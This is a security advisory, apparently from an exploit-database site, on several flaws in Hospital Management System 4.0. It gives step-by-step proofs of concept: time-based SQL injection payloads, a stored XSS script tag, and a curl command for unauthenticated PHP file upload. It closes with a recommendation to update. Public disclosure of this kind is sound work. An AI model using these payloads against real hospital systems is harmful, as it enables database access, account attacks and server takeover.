Hospital Management System 4.0 XSS / Shell Upload / SQL Injection

2023.12.24
Credit: Louise Ng
Risk: High
Local: No
Remote: Yes
CVE: CVE-2020-26630
CWE: CWE-89
CWE-79
CWE-264

Description: Mutiple vulnerabilties were discovered in Hospital Management System Affected CMS: Hospital Management System Affected Version: <= 4.0 CVE ID: CVE-2020-26627, CVE-2020-26628, CVE-2020-26629, CVE-2020-26630 CVSS Score: 7.2 (High) CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H Discoverers: Chris Chan @ UDomain Web Hosting Co.Ltd, Louise Ng @ UDomain Web Hosting Co.Ltd Multiple vulnerabilities were discovered in Hospital Management System v4.0 and before which allows a remote attacker to execute arbitary web scripts. Proof of Concept: Attack Vector 1 (Time-Based SQL injection): Step 1.) Login admin Step 2.) Go to Conatctus Queries -> unread query -> type something in admin remark (e.g test) and submit Step 3.) Replace the POST body to below payload and server will respond after 5 second. adminremark='/**/AND/**/(SELECT/**/1/**/FROM/**/(SELECT(SLEEP(5)))CXde)/**/AND/**/'a'='a&update= Attack Vector 2 (Time-Based SQL injection): Step 1.) Login admin Step 2.) Go to Doctors -> Doctor Specialization -> Click Submit Step 3.) Replace the POST body to below payload and server will respond after 5 second. doctorspecilization='/**/AND/**/(SELECT/**/1/**/FROM/**/(SELECT(SLEEP(5)))CXde)/**/AND/**/'a'='a&submit= Attack Vector 3 (Cross Site Scripting (XSS)): After attacker login, attacker can append malicious javascript behind their name. Other people will trigger xss when they visit this user. Step 1.) Login patient page Step 2.) Got to My Profile>Edit Profile. Step 3.) Append <ScRiPt >alert("poc")</ScRiPt> behind username and save Step 4.) Other user visit this profile will trigger xss Attacker Vector 4 (Unauthenticated Arbitrary File Upload): The HMS is using a vulnerable jquery file upload. Attacker can upload any file to server and trigger it. Step 1.) upload file with below curl command: curl -i -s -k -X $'POST' \ -H $'Content-Type: multipart/form-data; boundary=a211583f728c46a09ca726497e0a5a9f' -H $'Host: localhost' -H $'Content-Length: 164' \ --data-binary $'--a211583f728c46a09ca726497e0a5a9f\x0d\x0aContent-Disposition: form-data; name=\"files[]\"; filename=\"info.php\"\x0d\x0a\x0d\x0a<?php phpinfo(); ?>\x0d\x0a--a211583f728c46a09ca726497e0a5a9f--' \ $'http://localhost/hsm/hms/admin/vendor/jquery-file-upload//server/php/index.php' Step 2.) visit the url in response and trigger the php file. Recommendation Update to v5.2.0 https://phpgurukul.com/contact-us/ https://phpgurukul.com/hospital-management-system-in-php


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top